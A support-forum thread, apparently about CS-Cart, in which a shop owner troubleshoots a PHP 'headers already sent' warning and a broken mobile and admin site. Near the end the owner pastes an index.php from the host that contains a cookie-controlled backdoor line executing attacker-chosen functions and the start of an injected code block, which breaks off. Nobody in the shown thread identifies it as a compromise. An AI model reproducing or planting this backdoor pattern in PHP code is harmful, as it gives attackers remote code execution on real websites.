Bootstrap.php Issue

I'm getting this error across the top of my website :

Warning: Cannot modify header information - headers already sent by (output started at /home/alluring/public_html/app/Tygh/Tygh.php:37) in /home/alluring/public_html/app/Tygh/Bootstrap.php on line 34

Any ideas on how to resolve this?

Thank you!

It also seems my mobile site isn't working since this occurred :? .

Which files were modified recently? Looks like something was edited incorrectly and script flush unnecessary data to the broswer

46

Yeah, I fully agree with ecomlabs.

Joshin, please check have you edited something, coz this type of issues arrises when some unneccessary code is found.

Hello,

There might be some changes by newly installed add-on or someone recently made changes in your files.

Or issue might me while setting header.

If still you have issue then please share more info about your problem like when did it created or is issue still arising. If there is no hope then I can look at the problem. You can P.M me.

Thank you.

Himanshu Dangwal

Hi guys, thanks for your input!

I also asked my hosting company to look into it.

They said this did this:

"I have set in php.ini

output_buffering = On

to allow headers to be sent twice."

This actually got rid of that warning across the top of my site, however, my mobile site is still not working now. Could this be a separate issue? I haven't made any recent changes to my site other than clear out the cache in var.

Hi guys, thanks for your input!

I also asked my hosting company to look into it.

They said this did this:

"I have set in php.ini

output_buffering = On

to allow headers to be sent twice."

This actually got rid of that warning across the top of my site, however, my mobile site is still not working now. Could this be a separate issue? I haven't made any recent changes to my site other than clear out the cache in var.

Do you use twigmo for mobile view? What do you mean by "mobile site is still not working now"?

Yes, I'm using Twigmo...maybe I need to update this or something? By "mobile site is still not working now," I mean my mobile site is not loading on any devices.

Also, I just realized my admin page is not loading. My site is a hot mess!

I just got this message from my hosting company:

The index.php has:


if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);


/***************************************************************************
* *
* (c) 2004 Vladimir V. Kalynyak, Alexey V. Vinokurov, Ilya M. Shalnev *
* *
* This is commercial software, only users who have purchased a valid *
* license and accept to the terms of the License Agreement can install *
* and use this program. *
* *
****************************************************************************
* PLEASE READ THE FULL TEXT OF THE SOFTWARE LICENSE AGREEMENT IN THE *
* "copyright.txt" FILE PROVIDED WITH THIS DISTRIBUTION PACKAGE. *
****************************************************************************/

$php_value = phpversion();
if (version_compare($php_value, '5.3.6') == -1) {
echo 'Currently installed PHP version (' . $php_value . ') is not supported. Minimal required PHP version is 5.3.6.';
die();
}

define('AREA', 'C');

try {
require(dirname(__FILE__) . '/init.php');
fn_dispatch();
} catch (Tygh\Exceptions\AException $e) {
$e->output();
}

#3a8987#
if(empty($huk)) {
$huk = "